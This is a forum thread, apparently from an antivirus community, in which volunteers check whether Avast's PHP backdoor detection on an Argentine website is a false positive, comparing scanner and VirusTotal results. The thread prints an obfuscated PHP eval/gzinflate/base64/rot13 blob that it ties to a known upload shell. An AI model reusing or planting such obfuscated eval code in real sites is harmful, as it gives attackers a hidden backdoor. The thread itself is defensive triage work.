Can anybody check yhr following in order to check a false positive.
URL: http://www.psa.com.ar/usuarios/novedades
Infección: PHP:BackDoor-CB [Trj]
Proceso: C:\Program Files\Google\Chrome\Application\chrome.exe
Regards,
Gustavo Oga
Buenos Aires
Argentina
only avast detect
https://sitecheck.sucuri.net/results/www.psa.com.ar/usuarios/novedades
Sucuri blog / PHP backdoors https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html
i will see if i can get it confirmed from other labs …
Do a Quttera scan and you will see the PHP malware.
-/usuarios/novedades
Severity: Malicious
Reason: Detected malicious PHP content
Details: Detected malicious PHP content
Offset: 15914
[[eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9^^/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ^^DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5^^sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8="))));]]
Reported to Avast, so no FP.
Vuln.: -http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.psa.com.ar → -: //s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5303bb29505f7875 etc.
uMatrix has prevented the following page from loading:
-http://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5303bb29505f7875
polonus
when trying to access the home page received another notification
avast, in a moment did not show more
hxxp: //www.psa.com.ar/ JS:includer-BIW [Trj]
see the screenshot attached.
Hi jefferson sant,
That is what Avast detects there and there are only 2 AV to detect this. Detection has been found to be FP-prone, so we have to establish we see real malicious code here.
I found traces also of adblock circumventing code, so there might be a reason for it to be flagged.
Another example of a similar detection was seen here: https://api.vtapi.net/hu/file/6d2f3a59492223018e34c219832936457634a0220bab861d29bc3ffb55aeacf1/analysis/
The PHP malcode Quttera came up with is being discussed here: https://www.byte.nl/blog/analysis-of-http-posted-php-malware
Where Avast also blocks: http://ddecode.com/phpdecoder/?results=Backdoor -CB[Trj] for the deobfuscation. *
At various analysis sites I get the same Avast result. * PHP Syntax Check: Parse error: syntax error, unexpected ‘;’, expecting ‘]’ in your code on line 1
polonus (volunteer website security analyst and website error-hunter)
polonus
novedades.htm
https://www.virustotal.com/nb/file/eec5e6e5cee497b13c467684ad36217fbc294860fe0fa39a44179901bb550dc2/analysis/1441477265/
I am still stuck with this report, code won’t go away.
Re; http://quttera.com/detailed_report/www.psa.com.ar
I get Redirections:
HTTP Status Code: 500 Server Unavailable
Content Size: 0 bytes
Content Type: no/content
IP Address: 200.16.135.151
Country: Argentina
Web Server:
Netcraft does not like that IP: http://toolbar.netcraft.com/site_report?url=http://200.16.135.151
a meagre 4/100 green…
polonus
I am still stuck with this report, code won't go away. Re; http://quttera.com/detailed_report/www.psa.com.arquttera code scan https://www.virustotal.com/nb/file/b9fbbb67a433390579f9900fb4cf6171696ccc1b2f7b2710bc6483a52ec0b39e/analysis/1441488052/
Hi Pondus,
But here is the same PHP shell code, which is flagged the same by Avast: -https://www.google.pl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&uact=8&ved=0CEkQFjAFahUKEwiek8a-_uDHAhXGWhQKHRSfAJM&url=http%3A%2F%2Fwww.pakteenleets.net%2F2014%2F10%2Fsmall-upload-shell-php.html&usg=AFQjCNGPqwdFdrSRs-T3i7zxmpyU0rR9hg
Exactly what Quttera gives under view code!
Or the gzinflate recursively coded PHP shell must be benign - a FP on the compressed rot13 code?
pol
and that one is detected
https://www.virustotal.com/nb/file/e05fc0d660252ed3b76fdba22db0c723677f7c11da54c77297a4280091286752/analysis/1441570049/
there is a slight difference at the beginning and ending of the code
sample 1 = [[eval and end with "))));]]
sample 2 = <?php eval and end with ")))); ?>
EDIT: after looking closers there is also some minor code changes in the middel of the code
if the code was exactely identical, should not MD5 be the same?
Message fom BlueCoat lab …
the one sample that was detected, got auto added signature whan i uploaded it